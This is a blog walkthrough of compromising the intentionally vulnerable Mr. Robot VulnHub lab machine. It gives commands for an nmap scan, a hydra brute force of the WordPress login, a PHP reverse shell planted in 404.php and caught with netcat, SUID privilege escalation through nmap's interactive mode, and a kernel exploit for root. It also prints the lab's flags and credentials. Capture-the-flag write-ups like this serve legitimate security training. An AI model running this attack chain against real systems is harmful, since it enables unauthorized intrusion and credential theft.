Rooting Mr. Robot

folder_openOSCP, vulhub
commentNo Comments

Task Goal:

1. To get root access to the machine

2. Acquire three keys:

      1. Key 1: 073403c8a58a1f80d943455fb30724b9
      2. Key 2: 822c73956184f694993bede3eb39f959
      3. Key 3: 04787ddef27c3dee1ee161b21670b4e4

 

Resource Materials:
Download Mr. Robot Machine from Here.
Download Kali Linux Machine from Here.

Information Gathering:

Step 01:  ifconfig
Kali Linux Machine IP:  192.168.56.4

Step 02: nmap 192.168.56.4/24
Mr. Robot or Target Machine IP: 192.168.56.3


Step 03:  Get the details of ports and services running on Target Machine

nmap -sC -sV -p-  192.168.56.3 >  vulhub/mrrobot/nmap.log

It’s clearly showing that there is a web server  running on port 80 and 443. Let me visit those.

Yes, I checked the details of the front-end, didn’t find anything of use. Then, I checked the source code.

Nothing special either.

I read couple of write-ups in the past and those help me to have a methodology of myself. Usually, at this time, usually I check for availability of robots.txt and if I don’t find any, then I run nikto and gobuster.

Luckily I found something through robots.txt

I want to download those files.. By the way, by the look of it, I can deduce one thing that, I need to get three keys and out of those three, here is the first one 🙂 Yippee!

Step 04: Download all the materials

wget 192.168.56.3/fsocity.dic

wget 192.168.56.3/key-1-of-3.txt

cat key-1-of-3.txt

073403c8a58a1f80d943455fb30724b9

To be honest, my happiness did short live.. after the first key, I am reached at my wits end. Therefore, usually at such period, I look carefully to the things I found and if I didn’t find anything substantial, I do enumerate again..

I have two ideas in my mind.. one is to play around with the word list

 fsocity.dic

We will launch a brute force attack on wp-login.php page.

Another one is to perform nikto and gobuster. To save time, I am going to do everything simultaneously…

Luckily I performed sort, else it will definitely going to take a huge amount of time. (because I found many duplicate datas in the dictionary file which I downloaded from the target website)

By the way, I have saved a script to perform wp-login.php  bruteforce attack sometime back and I am glad that I can use it here 🙂  (By the way, you don’t have to worry about this script, if you which to learn about this, you can easily fire your burp suite and you will get the main logic and,  man hyra will help you to frame the argument).

Step 05:

1. Brute Force  wp-login.php

a)  We don’t know the username. So first we will do the username brute force.

hydra -vV -L fsociety.dic -p test 192.168.56.3 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username'

b) Username: is elliot
Now, we need to bruteforce password.  To get password, here is it..

hydra -vV -l elliot -P fsociety.dic 192.168.56.3 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username'

And password is : ER28-0652


At the background, I would like to run the following two tasks (because I want to dig little more)

2. Run nikto

nikto -h 192.168.56.3 > nikto-192.168.56.3.log

3. Run gobuster

gobuster dir -u http://192.168.56.3 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Step 05: Took huge amount of time (because of Brute Force)

Anyway, I logged into the website, and luckily “Editor” function is not disabled, that means I can inject my own code in there.  I am going to plant a php reverse shell there in 404.php page. Because not many developer or people care for this page.

pentest-monkey has great list of scripts.  you can download the php reverse shell from here.  

I did copy the shell and paste it in 404.php

By the way, you need to change the IP address and port number which mentioned the the php reverse shell. Port number can be anything of your choice and my favorite is 9000. well the IP address of my Kali Linux Machine is 192.168.56.5 (I reset my machine, you won’t face any problem)

My Kali Linux (or Attacker) machine is waiting the reverse connection

nc -lvp 9000

Now, all I need to do is to visit the 404.php. It indeed thrown reverse connection just by visiting http://192.168.56.5/404.php

I found the flag2 and a credential file. However, due to privilege restriction, I am not able to access it.

To be honest, at this moment,  I have left with no choice but to enumerate whether there are any SUID enabled binaries on the server; to escalate my current privilege … let’s try.. (If you need to know more about SUID binary finding, visit this link)

find / -perm -u=s -type f 2>/dev/null 

/usr/local/bin/nmap --interactive 

!sh 

cat home/robot/key-2-of-3.txt 
822c73956184f694993bede3eb39f959  [our second flag]

cat home/robot/password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b

Privilege escalation using nmap resource is here.

I tried john to crack the hash, and vm crashed for several times.. so I decided to move forward. (Later I was able to crack the hash using https://crackstation.net)

Again bumped to the wall so …what we need to do is enumerate more..

I read a many articles on eternal-blue and dirty cow, because many of the people recommend to try those (kernel) exploit if you don’t have any option left. At that moment, I thought it is my time to check for kernel exploit. Therefore, I checked the kernel version, and it is indeed vulnerable to an exploit.

kernel version of the Target machine:

uname -r

The kernel version is 3.13.0-55-generic, which is vulnerable to this exploit.

I did compiled the exploit on the victim machine and executed the exploit on victim machine and yeah.. Got the root as well as the third or the final flag..

gcc exploit.c -o exploit 
./exploit 
id 
cat /home/root/key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4

 

Voila!! Finally…

Although I have popped this machine earlier using msfconsole, but this time, I did it entirely  manually and it’s truly more satisfying and learned many more cool things!!

 

Tags: , , , ,

Related Posts

Leave a Reply

Your email address will not be published. Required fields are marked *

Fill out this field
Fill out this field
Please enter a valid email address.
You need to agree with the terms to proceed

Menu